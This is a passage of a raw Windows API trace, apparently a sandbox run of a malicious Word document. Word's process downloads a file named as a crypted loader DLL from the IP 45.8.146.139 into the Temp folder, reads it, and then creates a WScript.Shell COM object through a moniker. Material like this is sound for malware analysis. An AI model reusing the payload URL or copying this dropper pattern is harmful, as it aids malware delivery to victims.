(hModule=0x76720000, lpProcName="AcquireSRWLockExclusive") returned 0x7721d210 [0110.030] GetProcAddress (hModule=0x76720000, lpProcName="TryAcquireSRWLockExclusive") returned 0x771f3650 [0110.030] GetProcAddress (hModule=0x76720000, lpProcName="ReleaseSRWLockExclusive") returned 0x7721d080 [0110.031] GetProcAddress (hModule=0x76720000, lpProcName="SleepConditionVariableSRW") returned 0x76a47fb0 [0110.032] GetProcAddress (hModule=0x76720000, lpProcName="CreateThreadpoolWork") returned 0x7673ea00 [0110.032] GetProcAddress (hModule=0x76720000, lpProcName="SubmitThreadpoolWork") returned 0x7721ce10 [0110.033] GetProcAddress (hModule=0x76720000, lpProcName="CloseThreadpoolWork") returned 0x77220550 [0110.033] GetProcAddress (hModule=0x76720000, lpProcName="CompareStringEx") returned 0x7673ff80 [0110.034] GetProcAddress (hModule=0x76720000, lpProcName="GetLocaleInfoEx") returned 0x7673a750 [0110.034] GetProcAddress (hModule=0x76720000, lpProcName="LCMapStringEx") returned 0x76739a10 [0110.034] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x800) returned 0xb526150 [0110.035] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0110.035] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x121aa8f0, nSize=0x104 | out: lpFilename="C:\\Program Files (x86)\\Microsoft Office\\Office16\\WINWORD.EXE" (normalized: "c:\\program files (x86)\\microsoft office\\office16\\winword.exe")) returned 0x3c [0110.035] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x4c) returned 0xf4e7cc0 [0110.035] GetEnvironmentStringsW () returned 0xcd18cd0* [0110.035] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=::=::\\", cchWideChar=1557, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1557 [0110.035] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x615) returned 0xcc715f0 [0110.035] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=::=::\\", cchWideChar=1557, lpMultiByteStr=0xcc715f0, cbMultiByte=1557, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=::=::\\", lpUsedDefaultChar=0x0) returned 1557 [0110.035] FreeEnvironmentStringsW (penv=0xcd18cd0) returned 1 [0110.035] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0xa0) returned 0xf52dc28 [0110.035] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x1f) returned 0xf4ef2d8 [0110.035] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x2e) returned 0xf519ff0 [0110.035] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x37) returned 0xf4b0720 [0110.035] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x3c) returned 0xf507cb8 [0110.035] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x31) returned 0xf4b0ee0 [0110.035] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x14) returned 0xc986bd8 [0110.035] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x24) returned 0xb50b410 [0110.035] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x31) returned 0xf4b0fa0 [0110.035] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x28) returned 0xb50b3e0 [0110.035] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0xd) returned 0xf4a56b8 [0110.035] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x1d) returned 0xf4ef3c8 [0110.035] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x31) returned 0xf4b10a0 [0110.036] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x15) returned 0xc986bf8 [0110.036] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x17) returned 0xc986c18 [0110.036] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0xe) returned 0xf4a5748 [0110.036] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x69) returned 0xcaab3e0 [0110.036] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x3e) returned 0xf507d00 [0110.036] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x1b) returned 0xf4ef058 [0110.036] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x1d) returned 0xf4ef080 [0110.036] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x48) returned 0xcd2a8a0 [0110.036] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x12) returned 0xc986d18 [0110.085] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x18) returned 0xc9831d8 [0110.085] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x1b) returned 0xf4ef3f0 [0110.085] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x24) returned 0xb50b5f0 [0110.085] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x29) returned 0xf51a108 [0110.085] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x1e) returned 0xf4ef300 [0110.085] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x6b) returned 0xcaab458 [0110.085] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x17) returned 0xc982eb8 [0110.085] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x14) returned 0xc982ed8 [0110.085] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0xf) returned 0xf4a5700 [0110.085] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x16) returned 0xc983078 [0110.085] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x2a) returned 0xf51a140 [0110.085] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x29) returned 0xf51a840 [0110.085] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x12) returned 0xc982f78 [0110.085] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x21) returned 0xb50b230 [0110.085] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x16) returned 0xc9835b8 [0110.085] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x22) returned 0xb50b4a0 [0110.085] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x12) returned 0xc983398 [0110.085] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x93) returned 0xcab1d50 [0110.085] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0xcc715f0 | out: hHeap=0x630000) returned 1 [0110.086] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0xf4af9b0 [0110.086] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0xf501dd0 [0110.086] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0xf4ef198 [0110.086] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2) returned 0xf501ca0 [0110.086] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0xf501ca0 | out: hHeap=0x630000) returned 1 [0110.086] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2) returned 0xf501c20 [0110.086] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0xf501df0 [0110.086] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0xc9835d8 [0110.086] GetLastError () returned 0x0 [0110.087] SetLastError (dwErrCode=0x0) [0110.087] GetLastError () returned 0x0 [0110.087] SetLastError (dwErrCode=0x0) [0110.087] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0xb8) returned 0xb53cc78 [0110.087] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x6a6) returned 0xcc715f0 [0110.087] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0xcc715f0 | out: hHeap=0x630000) returned 1 [0110.087] GetLastError () returned 0x0 [0110.087] SetLastError (dwErrCode=0x0) [0110.087] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x6) returned 0xf501dc0 [0110.087] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2) returned 0xf501de0 [0110.087] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x4) returned 0xf501c90 [0110.087] GetLastError () returned 0x0 [0110.087] SetLastError (dwErrCode=0x0) [0110.087] GetLastError () returned 0x0 [0110.087] SetLastError (dwErrCode=0x0) [0110.087] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0xb8) returned 0xb53caf8 [0110.087] GetLastError () returned 0x0 [0110.087] SetLastError (dwErrCode=0x0) [0110.087] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x6a6) returned 0xcc715f0 [0110.087] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0xcc715f0 | out: hHeap=0x630000) returned 1 [0110.088] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0xf501dc0 | out: hHeap=0x630000) returned 1 [0110.088] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0xb53cc78 | out: hHeap=0x630000) returned 1 [0110.088] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0xf501c90 | out: hHeap=0x630000) returned 1 [0110.088] GetLastError () returned 0x0 [0110.088] SetLastError (dwErrCode=0x0) [0110.088] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x6) returned 0xf501cc0 [0110.088] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2) returned 0xf501d20 [0110.088] GetLastError () returned 0x0 [0110.088] SetLastError (dwErrCode=0x0) [0110.088] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x200) returned 0xc9dd5a0 [0110.088] GetLastError () returned 0x0 [0110.088] SetLastError (dwErrCode=0x0) [0110.088] GetLastError () returned 0x0 [0110.088] SetLastError (dwErrCode=0x0) [0110.088] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x4) returned 0xf501d50 [0110.088] GetLastError () returned 0x0 [0110.088] SetLastError (dwErrCode=0x0) [0110.088] GetLastError () returned 0x0 [0110.088] SetLastError (dwErrCode=0x0) [0110.088] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0xb8) returned 0xb53ceb8 [0110.088] GetLastError () returned 0x0 [0110.089] SetLastError (dwErrCode=0x0) [0110.089] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x6a6) returned 0xcc715f0 [0110.089] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0xcc715f0 | out: hHeap=0x630000) returned 1 [0110.089] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0xf501cc0 | out: hHeap=0x630000) returned 1 [0110.089] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0xb53caf8 | out: hHeap=0x630000) returned 1 [0110.089] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0xf501d50 | out: hHeap=0x630000) returned 1 [0110.089] GetLastError () returned 0x0 [0110.089] SetLastError (dwErrCode=0x0) [0110.089] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x6) returned 0xf501d50 [0110.089] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0xf501d20 | out: hHeap=0x630000) returned 1 [0110.089] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0xf501de0 | out: hHeap=0x630000) returned 1 [0110.089] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0xf501d40 [0110.089] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0xf4e7ab0 [0110.089] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0xf507be0 [0110.089] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0xf5077f0 [0110.090] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0xf507760 [0110.090] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0xcaab890 [0110.090] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0xcaab890 | out: hHeap=0x630000) returned 1 [0110.090] LocalAlloc (uFlags=0x40, uBytes=0x1000) returned 0xf6949d8 [0110.090] GetLocalTime (in: lpSystemTime=0x197574 | out: lpSystemTime=0x197574*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x4, wDay=0xb, wHour=0x13, wMinute=0x9, wSecond=0xe, wMilliseconds=0x25b)) [0110.090] wsprintfA (in: param_1=0xf6949d8, param_2="%02u:%02u:%02u " | out: param_1="19:09:14 ") returned 9 [0110.090] wsprintfA (in: param_1=0xf6949e1, param_2="Starting download\n" | out: param_1="Starting download\n") returned 18 [0110.090] OutputDebugStringA (lpOutputString="19:09:14 Starting download\n") [0110.091] LocalFree (hMem=0xf6949d8) returned 0x0 [0110.091] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1033) returned 0xcd18cd0 [0110.092] GetTempPathA (in: nBufferLength=0x1000, lpBuffer=0xcd18ce0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\") returned 0x25 [0110.093] GetTempFileNameA (in: lpPathName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\", lpPrefixString="y", uUnique=0x0, lpTempFileName=0xcd18ce0 | out: lpTempFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\yBDEB.tmp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\ybdeb.tmp")) returned 0xbdeb [0110.095] DeleteFileA (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\yBDEB.tmp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\ybdeb.tmp")) returned 1 [0110.096] LocalAlloc (uFlags=0x40, uBytes=0x1000) returned 0xf6949d8 [0110.096] GetLocalTime (in: lpSystemTime=0x1975d8 | out: lpSystemTime=0x1975d8*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x4, wDay=0xb, wHour=0x13, wMinute=0x9, wSecond=0xe, wMilliseconds=0x25b)) [0110.096] wsprintfA (in: param_1=0xf6949d8, param_2="%02u:%02u:%02u " | out: param_1="19:09:14 ") returned 9 [0110.096] wsprintfA (in: param_1=0xf6949e1, param_2="Starting download from %s to %s\n" | out: param_1="Starting download from http://45.8.146.139/fhfty/A8-39SODTF9EOBD6C7Q2AKY01XKI_WQ2/loader_p3_dll_64_n3_crypt_x64_asm_clone_n129.dll to C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\yBDEB.tmp.dll\n") returned 185 [0110.096] OutputDebugStringA (lpOutputString="19:09:14 Starting download from http://45.8.146.139/fhfty/A8-39SODTF9EOBD6C7Q2AKY01XKI_WQ2/loader_p3_dll_64_n3_crypt_x64_asm_clone_n129.dll to C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\yBDEB.tmp.dll\n") [0110.096] LocalFree (hMem=0xf6949d8) returned 0x0 [0110.096] LoadLibraryA (lpLibFileName="urlmon.dll") returned 0x71780000 [0110.124] URLDownloadToFileA (param_1=0x0, param_2="http://45.8.146.139/fhfty/A8-39SODTF9EOBD6C7Q2AKY01XKI_WQ2/loader_p3_dll_64_n3_crypt_x64_asm_clone_n129.dll", param_3="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\yBDEB.tmp.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\ybdeb.tmp.dll"), param_4=0x0, param_5=0x0) returned 0x0 [0112.789] LocalAlloc (uFlags=0x40, uBytes=0x1000) returned 0xf6929c8 [0112.789] GetLocalTime (in: lpSystemTime=0x1975c8 | out: lpSystemTime=0x1975c8*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x4, wDay=0xb, wHour=0x13, wMinute=0x9, wSecond=0x11, wMilliseconds=0x133)) [0112.789] wsprintfA (in: param_1=0xf6929c8, param_2="%02u:%02u:%02u " | out: param_1="19:09:17 ") returned 9 [0112.789] GetLastError () returned 0x0 [0112.790] FormatMessageA (in: dwFlags=0x1300, lpSource=0x0, dwMessageId=0x0, dwLanguageId=0x400, lpBuffer=0x19700c, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x90µP\x0b") returned 0x27 [0112.790] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0xf51a4f8 [0112.791] LocalFree (hMem=0xb50b590) returned 0x0 [0112.791] GetLastError () returned 0x0 [0112.791] wsprintfA (in: param_1=0xf6929d1, param_2="Finished download from %s to %s: %d %s\n" | out: param_1="Finished download from http://45.8.146.139/fhfty/A8-39SODTF9EOBD6C7Q2AKY01XKI_WQ2/loader_p3_dll_64_n3_crypt_x64_asm_clone_n129.dll to C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\yBDEB.tmp.dll: 0 Error#0:The operation completed successfully.\r\n\n") returned 236 [0112.791] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0xf51a4f8 | out: hHeap=0x630000) returned 1 [0112.791] OutputDebugStringA (lpOutputString="19:09:17 Finished download from http://45.8.146.139/fhfty/A8-39SODTF9EOBD6C7Q2AKY01XKI_WQ2/loader_p3_dll_64_n3_crypt_x64_asm_clone_n129.dll to C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\yBDEB.tmp.dll: 0 Error#0:The operation completed successfully.\r\n\n") [0112.791] LocalFree (hMem=0xf6929c8) returned 0x0 [0112.791] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0xf507d90 [0112.791] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x38) returned 0xc9d6328 [0112.791] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x76720000 [0112.792] GetProcAddress (hModule=0x76720000, lpProcName="AreFileApisANSI") returned 0x7673f300 [0112.792] AreFileApisANSI () returned 1 [0112.792] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xf507d90, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 51 [0112.792] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x66) returned 0xf4dedb0 [0112.792] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xf507d90, cbMultiByte=-1, lpWideCharStr=0xf4dedb0, cchWideChar=51 | out: lpWideCharStr="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\yBDEB.tmp.dll") returned 51 [0112.793] CreateFileW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\yBDEB.tmp.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\ybdeb.tmp.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x196ea4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xcd8 [0112.793] GetFileType (hFile=0xcd8) returned 0x1 [0112.793] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0xf4dedb0 | out: hHeap=0x630000) returned 1 [0112.793] CloseHandle (hObject=0xcd8) returned 1 [0112.793] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0xf507d90 | out: hHeap=0x630000) returned 1 [0112.793] AreFileApisANSI () returned 1 [0112.793] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xcd18ce0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 51 [0112.793] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x66) returned 0xf4ded40 [0112.793] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xcd18ce0, cbMultiByte=-1, lpWideCharStr=0xf4ded40, cchWideChar=51 | out: lpWideCharStr="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\yBDEB.tmp.dll") returned 51 [0112.793] CreateFileW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\yBDEB.tmp.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\ybdeb.tmp.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x196ecc, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xcd8 [0112.793] GetFileType (hFile=0xcd8) returned 0x1 [0112.794] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0xf4ded40 | out: hHeap=0x630000) returned 1 [0112.794] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1000) returned 0xf6929c8 [0112.794] ReadFile (in: hFile=0xcd8, lpBuffer=0xf6929c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x196efc, lpOverlapped=0x0 | out: lpBuffer=0xf6929c8*, lpNumberOfBytesRead=0x196efc*=0xf7, lpOverlapped=0x0) returned 1 [0112.794] ReadFile (in: hFile=0xcd8, lpBuffer=0xf6929c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x196efc, lpOverlapped=0x0 | out: lpBuffer=0xf6929c8*, lpNumberOfBytesRead=0x196efc*=0x0, lpOverlapped=0x0) returned 1 [0112.794] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0xf6929c8 | out: hHeap=0x630000) returned 1 [0112.794] CloseHandle (hObject=0xcd8) returned 1 [0112.795] GetLastError () returned 0x0 [0112.795] GetProcAddress (hModule=0x76910000, lpProcName="FlsGetValue") returned 0x769bf350 [0112.796] SetLastError (dwErrCode=0x0) [0112.796] GetLastError () returned 0x0 [0112.796] SetLastError (dwErrCode=0x0) [0112.798] GetLastError () returned 0x0 [0112.798] SetLastError (dwErrCode=0x0) [0112.798] GetLastError () returned 0x0 [0112.798] SetLastError (dwErrCode=0x0) [0112.807] Sleep (dwMilliseconds=0x0) [0112.867] GetAsyncKeyState (vKey=3) returned 0 [0112.867] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.867] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.867] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.867] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.867] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.867] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.867] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.867] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.867] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.867] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.867] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.867] GetLocalTime (in: lpSystemTime=0x197b4c | out: lpSystemTime=0x197b4c*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x4, wDay=0xb, wHour=0x13, wMinute=0x9, wSecond=0x11, wMilliseconds=0x181)) [0112.868] Sleep (dwMilliseconds=0x0) [0112.898] SetErrorMode (uMode=0x8001) returned 0x8001 [0112.898] _stricmp (_Str1="user32", _Str2="VBE6.DLL") returned -1 [0112.898] LoadLibraryA (lpLibFileName="user32") returned 0x743d0000 [0112.899] SetErrorMode (uMode=0x8001) returned 0x8001 [0112.900] GetProcAddress (hModule=0x743d0000, lpProcName="KillTimer") returned 0x74408aa0 [0112.900] KillTimer (hWnd=0x0, uIDEvent=0x7f7b) returned 1 [0112.900] GetLastError () returned 0x0 [0112.902] VarCmp (pvarLeft=0x197d44, pvarRight=0x197d34, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.902] VarCmp (pvarLeft=0x197d44, pvarRight=0x197d34, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.902] VarCmp (pvarLeft=0x197d44, pvarRight=0x197d34, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.902] VarCmp (pvarLeft=0x197d44, pvarRight=0x197d34, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.903] VarCmp (pvarLeft=0x19799c, pvarRight=0x19798c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.903] VarCmp (pvarLeft=0x19799c, pvarRight=0x19798c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.903] VarCmp (pvarLeft=0x19799c, pvarRight=0x19798c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.903] VarCmp (pvarLeft=0x19799c, pvarRight=0x19798c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.903] VarCmp (pvarLeft=0x19799c, pvarRight=0x19798c, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.903] CreateBindCtx (in: reserved=0x0, ppbc=0x197808 | out: ppbc=0x197808*=0xc9d67a8) returned 0x0 [0112.904] MkParseDisplayName (in: pbc=0xc9d67a8, szUserName="new:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B", pchEaten=0x19780c, ppmk=0x197810 | out: pchEaten=0x19780c, ppmk=0x197810*=0xc9d6528) returned 0x0 [0112.905] IUnknown:Release (This=0xc9d67a8) returned 0x0 [0112.905] BindMoniker (in: pmk=0xc9d6528, grfOpt=0x0, iidResult=0x695f8088*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvResult=0x197804 | out: ppvResult=0x197804*=0x8cecf04) returned 0x0 [0112.906] IUnknown:Release (This=0xc9d6528) returned 0x0 [0112.907] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x197bac | out: ppsaOut=0x197bac) returned 0x0 [0112.907] SafeArrayAllocData (psa=0xb50b5a0) returned 0x0 [0112.918] SafeArrayDestroyData (psa=0xb50b5a0) returned 0x0 [0112.918] SafeArrayDestroyDescriptor (psa=0xb50b5a0) returned 0x0 [0112.924] VarCmp (pvarLeft=0x197d44, pvarRight=0x197d34, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.924] VarCmp (pvarLeft=0x197d44, pvarRight=0x197d34, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.924] VarCmp (pvarLeft=0x197d44, pvarRight=0x197d34, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.924] VarCmp (pvarLeft=0x197d44, pvarRight=0x197d34, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.925] VarCmp (pvarLeft=0x19799c, pvarRight=0x19798c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.925] VarCmp (pvarLeft=0x19799c, pvarRight=0x19798c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.925] VarCmp (pvarLeft=0x19799c, pvarRight=0x19798c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.925] VarCmp (pvarLeft=0x19799c, pvarRight=0x19798c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.925] VarCmp (pvarLeft=0x19799c, pvarRight=0x19798c, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.925] CreateBindCtx (in: reserved=0x0, ppbc=0x197808 | out: ppbc=0x197808*=0xc9d64a8) returned 0x0 [0112.926] MkParseDisplayName (in: pbc=0xc9d64a8, szUserName="new:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B", pchEaten=0x19780c, ppmk=0x197810 | out: pchEaten=0x19780c, ppmk=0x197810*=0xc9d63e8) returned 0x0 [0112.926] IUnknown:Release (This=0xc9d64a8) returned 0x0 [0112.926] BindMoniker (in: pmk=0xc9d63e8, grfOpt=0x0, iidResult=0x695f8088*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvResult=0x197804 | out: ppvResult=0x197804*=0x8cecae4) returned 0x0 [0112.927] IUnknown:Release (This=0xc9d63e8) returned 0x0 [0112.930] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x197bac | out: ppsaOut=0x197bac) returned 0x0 [0112.930] SafeArrayAllocData (psa=0xb50b5a0) returned 0x0 [0112.933] SafeArrayDestroyData (psa=0xb50b5a0) returned 0x0 [0112.933] SafeArrayDestroyDescriptor (psa=0xb50b5a0) returned 0x0 [0112.937] 